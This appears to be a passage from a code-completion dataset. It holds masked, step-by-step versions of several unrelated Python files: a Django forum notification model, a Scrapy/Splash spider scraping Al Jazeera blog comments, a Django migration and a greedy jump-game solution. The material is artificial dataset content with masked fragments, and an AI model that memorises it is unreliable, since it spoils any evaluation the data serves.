instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-2": "<mask token>\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-3": "<mask token>\nTopic = model_factory(AbstractTopic)\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-4": "from __future__ import unicode_literals\nfrom machina.apps.forum_conversation.abstract_models import AbstractPost\nfrom machina.apps.forum_conversation.abstract_models import AbstractTopic\nfrom machina.core.db.models import model_factory\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\nTopic = model_factory(AbstractTopic)\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(self\n .topic.forum.slug, self.topic.forum.id, self.topic.slug, self.\n topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Flag updates on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\n 'Vote update on post {}'.format(self.subject),\n notification_link=notification_link)\n n.save()\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n flag_count = models.PositiveIntegerField(verbose_name=_('Flag count'),\n editable=False, blank=True, default=0)\n\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance)\n\n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save()\n\n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = 'You have a new notification'\n notification_link = '/forum/{}-{}/topic/{}-{}/?post={}#{}'.format(instance\n .topic.forum.slug, instance.topic.forum.id, instance.topic.slug,\n instance.topic.id, instance.id, instance.id)\n if created:\n notification_content = ('A new post was created on your topic {}'.\n format(instance.topic.slug))\n else:\n notification_content = (\"A post's contetn was edited on your topic {}\"\n .format(instance.topic.slug))\n n = UserNotification(user=user, notification_link=notification_link,\n notification_content=notification_content)\n n.save()\n",
"step-5": "# -*- coding: utf-8 -*-\n\nfrom __future__ import unicode_literals\n\nfrom machina.apps.forum_conversation.abstract_models import AbstractPost\nfrom machina.apps.forum_conversation.abstract_models import AbstractTopic\nfrom machina.core.db.models import model_factory\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\n\nTopic = model_factory(AbstractTopic)\n\n\nclass UserNotification(models.Model):\n user = models.ForeignKey(User, on_delete=models.CASCADE)\n notification_content = models.CharField(max_length=100)\n notification_link = models.CharField(max_length=100)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\nclass Post(AbstractPost):\n __original_flags = None\n __original_votes = None\n\n def __init__(self, *args, **kwargs):\n super(Post, self).__init__(*args, **kwargs)\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\n def save(self, force_insert=False, force_update=False, *args, **kwargs):\n super(Post, self).save(force_insert, force_update, *args, **kwargs)\n\n notification_link = \"/forum/{}-{}/topic/{}-{}/?post={}#{}\".format(self.topic.forum.slug, self.topic.forum.id, self.topic.slug, self.topic.id, self.id, self.id)\n if self.__original_flags != self.flag_count:\n n = UserNotification(user=self.poster, notification_content=\"Flag updates on post {}\".format(self.subject), notification_link=notification_link)\n n.save()\n\n if self.__original_votes != self.vote_count:\n n = UserNotification(user=self.poster, notification_content=\"Vote update on post {}\".format(self.subject), notification_link=notification_link)\n n.save()\n\n self.__original_flags = self.flag_count\n self.__original_votes = self.vote_count\n\nclass Userflags(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n\n flag_count = models.PositiveIntegerField(\n verbose_name=_('Flag count'), editable=False, blank=True, default=0)\n\n@receiver(post_save, sender=User)\ndef create_userflags(sender, instance, created, **kwargs):\n if created:\n Userflags.objects.create(user=instance) \n\n@receiver(post_save, sender=User)\ndef save_userflags(sender, instance, **kwargs):\n instance.userflags.save() \n\n@receiver(post_save, sender=Post)\ndef make_notifications(sender, instance, created, **kwargs):\n user = instance.topic.poster\n notification_content = \"You have a new notification\"\n notification_link = \"/forum/{}-{}/topic/{}-{}/?post={}#{}\".format(instance.topic.forum.slug, instance.topic.forum.id, instance.topic.slug, instance.topic.id, instance.id, instance.id)\n\n if created:\n notification_content = \"A new post was created on your topic {}\".format(instance.topic.slug)\n else:\n notification_content = \"A post's contetn was edited on your topic {}\".format(instance.topic.slug)\n\n n = UserNotification(user=user, notification_link=notification_link, notification_content=notification_content)\n n.save()\n",
"step-ids": [
10,
11,
12,
13,
14
]
}
|
[
10,
11,
12,
13,
14
] |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import re
import arabic_reshaper
from scrapy import Spider, Request
from bidi.algorithm import get_display
from websites.items import ArticleItem
from operator import add
from scrapy_splash import SplashRequest
class Blogsaljazeera2Spider(Spider):
name = 'blogsaljazeera2'
allowed_domains = ['blogs.aljazeera.net']
start_urls = ['http://blogs.aljazeera.net/topics/short']
@staticmethod
def cleanhtml(raw_html):
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, '', raw_html)
return cleantext
@staticmethod
def lua_script(n):
LUA_SCRIPT = """
function main(splash)
local url = splash.args.url
assert(splash:go(url))
assert(splash:wait(1))
for i=1,{},1 do
assert(splash:runjs('document.getElementsByTagName("button")[0].click()'))
assert(splash:wait(1))
end
return {}
end
""".format(n, "{html=splash:html()}")
return LUA_SCRIPT
def parse(self, response):
for url in self.start_urls:
yield Request(response.urljoin(url), self.parse_result, meta={
'splash': {
'args': {'lua_source': self.lua_script(2)},
'endpoint': 'execute',
}
})
def parse_result(self, response):
for link in response.xpath("//*[@id='topics_Artilce_container']/div/a/@href").extract():
yield Request(response.urljoin(link), self.parse_links, dont_filter=False)
def parse_links(self, response):
rep = int(int(response.xpath("//input[@id='intTotal']/@value").extract_first())/6)+1
yield SplashRequest(url=response.urljoin(''), callback=self.parse_comment, endpoint='execute', args={'lua_source': self.lua_script(rep)})
def parse_comment(self, response):
item = ArticleItem()
title = ""
try:
title = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath("//h1[@class='tweet_strip_text']/text()").extract_first()).strip()))
except (RuntimeError, TypeError, NameError):
pass
item["title"] = title
author = ""
try:
author = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath("null").extract_first()).strip()))
except (RuntimeError, TypeError, NameError):
pass
item["author"] = author
item["link"] = response.url
description = list()
try:
description.extend([self.cleanhtml(d) for d in get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath("null").extract())))])
except (RuntimeError, TypeError, NameError):
pass
item["description"] = description
comment = list()
names = list()
feeds = list()
try:
comment.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath("//article/p/text()").extract()])
names.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath("//article/div/div/h2/text()").extract()])
feeds.extend([self.cleanhtml(d) for d in response.xpath("//*[@class='number_likes']/text()").extract()])
except (RuntimeError, TypeError, NameError):
pass
item["comments"] = comment
item["names"] = names
item["feedbacks"] = feeds
return item
|
normal
|
{
"blob_id": "17058b323c0a0974dfa8f124ccd6cb5bf29dd849",
"index": 2065,
"step-1": "<mask token>\n\n\nclass Blogsaljazeera2Spider(Spider):\n <mask token>\n <mask token>\n <mask token>\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n <mask token>\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-2": "<mask token>\n\n\nclass Blogsaljazeera2Spider(Spider):\n <mask token>\n <mask token>\n <mask token>\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").\n extract_first()) / 6) + 1\n yield SplashRequest(url=response.urljoin(''), callback=self.\n parse_comment, endpoint='execute', args={'lua_source': self.\n lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-3": "<mask token>\n\n\nclass Blogsaljazeera2Spider(Spider):\n name = 'blogsaljazeera2'\n allowed_domains = ['blogs.aljazeera.net']\n start_urls = ['http://blogs.aljazeera.net/topics/short']\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").\n extract_first()) / 6) + 1\n yield SplashRequest(url=response.urljoin(''), callback=self.\n parse_comment, endpoint='execute', args={'lua_source': self.\n lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-4": "from __future__ import unicode_literals\nimport re\nimport arabic_reshaper\nfrom scrapy import Spider, Request\nfrom bidi.algorithm import get_display\nfrom websites.items import ArticleItem\nfrom operator import add\nfrom scrapy_splash import SplashRequest\n\n\nclass Blogsaljazeera2Spider(Spider):\n name = 'blogsaljazeera2'\n allowed_domains = ['blogs.aljazeera.net']\n start_urls = ['http://blogs.aljazeera.net/topics/short']\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = (\n \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\"\n .format(n, '{html=splash:html()}'))\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute'}})\n\n def parse_result(self, response):\n for link in response.xpath(\n \"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links,\n dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").\n extract_first()) / 6) + 1\n yield SplashRequest(url=response.urljoin(''), callback=self.\n parse_comment, endpoint='execute', args={'lua_source': self.\n lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n title = ''\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath(\n \"//h1[@class='tweet_strip_text']/text()\").extract_first()).\n strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['title'] = title\n author = ''\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(response.xpath('null').extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item['author'] = author\n item['link'] = response.url\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(\n arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath\n ('null').extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item['description'] = description\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath('//article/p/text()'\n ).extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.\n cleanhtml(d))) for d in response.xpath(\n '//article/div/div/h2/text()').extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\n \"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item['comments'] = comment\n item['names'] = names\n item['feedbacks'] = feeds\n return item\n",
"step-5": "# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport re\nimport arabic_reshaper\nfrom scrapy import Spider, Request\nfrom bidi.algorithm import get_display\nfrom websites.items import ArticleItem\nfrom operator import add\nfrom scrapy_splash import SplashRequest\n\n\nclass Blogsaljazeera2Spider(Spider):\n name = 'blogsaljazeera2'\n allowed_domains = ['blogs.aljazeera.net']\n start_urls = ['http://blogs.aljazeera.net/topics/short']\n\n\n @staticmethod\n def cleanhtml(raw_html):\n cleanr = re.compile('<.*?>')\n cleantext = re.sub(cleanr, '', raw_html)\n return cleantext\n\n @staticmethod\n def lua_script(n):\n LUA_SCRIPT = \"\"\"\n function main(splash)\n local url = splash.args.url\n assert(splash:go(url))\n assert(splash:wait(1))\n for i=1,{},1 do\n assert(splash:runjs('document.getElementsByTagName(\"button\")[0].click()'))\n assert(splash:wait(1))\n end\n return {}\n end\n \"\"\".format(n, \"{html=splash:html()}\")\n return LUA_SCRIPT\n\n def parse(self, response):\n for url in self.start_urls:\n yield Request(response.urljoin(url), self.parse_result, meta={\n 'splash': {\n 'args': {'lua_source': self.lua_script(2)},\n 'endpoint': 'execute',\n }\n })\n\n def parse_result(self, response):\n for link in response.xpath(\"//*[@id='topics_Artilce_container']/div/a/@href\").extract():\n yield Request(response.urljoin(link), self.parse_links, dont_filter=False)\n\n def parse_links(self, response):\n rep = int(int(response.xpath(\"//input[@id='intTotal']/@value\").extract_first())/6)+1\n yield SplashRequest(url=response.urljoin(''), callback=self.parse_comment, endpoint='execute', args={'lua_source': self.lua_script(rep)})\n\n def parse_comment(self, response):\n item = ArticleItem()\n\n title = \"\"\n try:\n title = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath(\"//h1[@class='tweet_strip_text']/text()\").extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"title\"] = title\n\n author = \"\"\n try:\n author = get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath(\"null\").extract_first()).strip()))\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"author\"] = author\n\n item[\"link\"] = response.url\n\n description = list()\n try:\n description.extend([self.cleanhtml(d) for d in get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(response.xpath(\"null\").extract())))])\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"description\"] = description\n\n comment = list()\n names = list()\n feeds = list()\n try:\n comment.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath(\"//article/p/text()\").extract()])\n names.extend([get_display(arabic_reshaper.reshape(u'' + self.cleanhtml(d))) for d in response.xpath(\"//article/div/div/h2/text()\").extract()])\n feeds.extend([self.cleanhtml(d) for d in response.xpath(\"//*[@class='number_likes']/text()\").extract()])\n except (RuntimeError, TypeError, NameError):\n pass\n item[\"comments\"] = comment\n item[\"names\"] = names\n item[\"feedbacks\"] = feeds\n\n return item\n",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
# Generated by Django 3.1.1 on 2020-10-07 04:04
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('articals', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='artical',
name='thumb',
field=models.ImageField(blank=True, default='default.png', upload_to='media/'),
),
]
|
normal
|
{
"blob_id": "d69bffb85d81ab3969bfe7dfe2759fa809890208",
"index": 503,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('articals', '0001_initial')]\n operations = [migrations.AddField(model_name='artical', name='thumb',\n field=models.ImageField(blank=True, default='default.png',\n upload_to='media/'))]\n",
"step-4": "from django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('articals', '0001_initial')]\n operations = [migrations.AddField(model_name='artical', name='thumb',\n field=models.ImageField(blank=True, default='default.png',\n upload_to='media/'))]\n",
"step-5": "# Generated by Django 3.1.1 on 2020-10-07 04:04\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('articals', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='artical',\n name='thumb',\n field=models.ImageField(blank=True, default='default.png', upload_to='media/'),\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Greedy Algorithm solves a problem by building a solution incrementally
# The algorithm is greedy because it chooses the next step that gives the most benefit
# Can save a lot of time when used correctly since they don't have to look at the entire problem space
# It's either the most optimal solution or it doesn't work at all, so you have to know for sure when to use it
# It's a short-sighted algorithm since we are only looking to optimize the input, not the entire solution
# Problem 1 JUMP GAME
# given an array of non-negative integers, we are starting at the first index of the array
# each element in the array represents our maximum jump length at that position
# determine if we can reach the last index
# this stands out as a greedy algorithm
#ex. [2,3,1,1,4]
# true since we can go from 2 to 3 to 4, or 2 to 1 to 1 to 4
class Solution:
#O(n) runtime b/c iterating through array
#O(1) SC b/c no extra space taken up
def canJump(self, nums):
best_index = 0
# for each index in the array
for i in range(len(nums)):
# if the current index is greater than the best index
if i > best_index:
return False
# the best index will become the maximum between the best index and the number at the current index + the current index
best_index = max(best_index, nums[i] + i)
return True
if __name__ == "__main__":
ok = Solution()
ans = ok.canJump([2,3,1,1,4])
print(ans)
|
normal
|
{
"blob_id": "f6974c0e5908710031bc3c3bb75c277be426632c",
"index": 2789,
"step-1": "<mask token>\n",
"step-2": "class Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "class Solution:\n\n def canJump(self, nums):\n best_index = 0\n for i in range(len(nums)):\n if i > best_index:\n return False\n best_index = max(best_index, nums[i] + i)\n return True\n\n\n<mask token>\n",
"step-4": "class Solution:\n\n def canJump(self, nums):\n best_index = 0\n for i in range(len(nums)):\n if i > best_index:\n return False\n best_index = max(best_index, nums[i] + i)\n return True\n\n\nif __name__ == '__main__':\n ok = Solution()\n ans = ok.canJump([2, 3, 1, 1, 4])\n print(ans)\n",
